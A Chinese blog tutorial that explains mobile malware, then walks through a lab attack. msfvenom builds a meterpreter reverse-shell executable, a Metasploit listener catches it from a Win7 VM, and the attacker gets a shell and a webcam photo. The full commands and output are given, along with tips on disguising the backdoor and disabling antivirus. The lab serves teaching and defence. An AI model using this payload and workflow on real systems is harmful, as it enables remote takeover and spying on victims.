★关于道德伦理的忠告★
关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。
以下内容摘自《Metasploit渗透测试指南》
作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:
-
不要进行恶意的攻击;
-
不要做傻事;
-
在没有获得书面授权时,不要攻击任何目标;
-
考虑你的行为将会带来的后果;
-
如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。
1、手机恶意应用程序分析
1.1、手机恶意应用程序理解
手机恶意应用程序:一般是指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。
1.2、危害性
恶意程序中植入的木马程序 ,可在用户不知情的情况下 ,收集用户个人隐私信息、恶意扣费 。
1.3、如何实现?
很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生 。
1.4、“官方”八招对付
八招对付恶意软件【来源于人民日报】:
1、选择官方渠道下载
2、关注流量使用
3、谨慎ROOT
4、注意权限信息
5、安装防病毒软件
6、不要在未知安全性的WIFI网络中上网
7、及时止损
8、及时举报
2、MSF恶意程序利用
2.0、说明
因为手机恶意程序利用的实验,我自己没有验证过就暂不做分享,以win7实验做为示例。
2.1、制作window恶意获取shell
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为 。
思路:利用社会工程学中人的心理,为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell 。
2.1.1、简介
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
实验内容:
制作Windows恶意软件获取shell,msfvenom的shell在windows中的使用 msfvenom生成shell.exe
2.1.2、实验步骤
2.1.2.1、实验环境
kali-linux系统,版本:Linux kali 5.10.0-kali9-amd64,IP:192.168.242.4
win7系统,IP:192.168.242.6
2.1.2.2、生成后门软件
在kali系统生成后门软件,然后先复制到外面(本机),再复制到目标系统win7
msfvenom -p 添加载荷payload LHOST=监听的IP LPORT=监听的端口,只要不占用即可 -f 输出文件格式 > 目标文件的名称
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6060 -f exe > msftest.exe
注意:该步骤自己电脑的杀毒软件和防火墙需要暂时关闭,如果不想关闭的话,可以利用ms17-010漏洞上传文件到win7电脑,可以参考我前面写的《渗透测试实战-漏洞利用MS17-010》
2.1.2.3、启动侦听
在kali系统操作
# 启动metaspliot
msfconsole
# 启动成功结果--每次的图案不一样,主要关注下面的是否有msf6> 即表示成功
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
msf6 >
# metasploit设置侦听 加载模块
msf6 > use exploit/multi/handler
# 引用成功结果 ,再在后面
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
# 设置payload
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#设置kali的IP
msf6 exploit(multi/handler) > set lhost kali的ip
#设置kali的端口lport =6060,也就是生成后门的端口
msf6 exploit(multi/handler) > set lport 6060
#执行
msf6 exploit(multi/handler) > exploit 或者 run
# 结果
[*] Started reverse TCP handler on 192.168.242.4:6060
2.1.2.4、win7系统双击后门软件
win7系统双击后门软件,然后观察kali系统会看到有对应信息串联起来,效果如下
[*] Sending stage (175174 bytes) to 192.168.242.6
[*] Meterpreter session 1 opened (192.168.242.4:6060 -> 192.168.242.6:2327) at 2023-09-11 11:07:36 -0400
2.1.2.4、操作命令控制win7系统
# 输入命令行
meterpreter > shell
# 连接成功
Process 8856 created.
Channel 1 created.
# 退出当前操作
exit
# 可进行拍照,只要目标系统有拍照功能
# 查看摄像头
meterpreter > webcam_list
# 结果表示有
1: Integrated Camera
# 通过摄像头拍照
meterpreter > webcam_snap
标签:实战,kali,win7,192.168,恶意程序,handler,MSF,2.1,msf6
From: https://www.cnblogs.com/huangxiufen/p/17738652.html